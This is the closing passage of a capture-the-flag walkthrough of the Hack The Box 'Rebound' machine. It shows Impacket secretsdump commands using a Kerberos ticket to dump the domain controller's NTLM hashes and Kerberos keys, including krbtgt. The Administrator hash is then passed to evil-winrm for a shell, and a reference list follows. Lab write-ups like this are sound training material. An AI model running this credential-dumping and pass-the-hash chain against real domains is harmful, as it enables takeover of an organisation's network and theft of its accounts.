(impacket-fork) [root@kali ~ ]$ KRB5CCNAME=./DC01\$@http_dc01.rebound.htb@REBOUND.HTB.ccache secretsdump.py -k -no-pass dc01.rebound.htb -just-dc-user administrator
/root/impacket-fork/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'secretsdump.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...
(impacket-fork) [root@kali ~ ]$ KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' secretsdump.py -no-pass -k dc01.rebound.htb -just-dc-ntlm
/root/impacket-fork/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'secretsdump.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:43e9069a73081ecfcbe1514e1d4e3bc8:::
[*] Cleaning up...

Pass the NT hash to evil-winrm to get an Administrator shell:

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2582]
└─[$] evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8 [5:36:50]

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rebound\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> cat root.txt
af2b247a25910f7c8b320c45ab507ae4

Reference Sources

  • 0xdf’s blog rebound walkthrough
  • Impacket
  • New Attack Paths? AS Requested Service Tickets
  • Support for Kerberoasting without pre-authentication and ST request through AS-REQ #1413
  • impacket GitHub fork
  • bloodhound.py
  • Active Directory Bloodhound
  • Descendant Object Takeover (DOT)
  • powerview.py
  • ShadowCredentials
  • KrbRelay
  • RunasCs
  • bloodyAD
  • Service-for-User (S4U)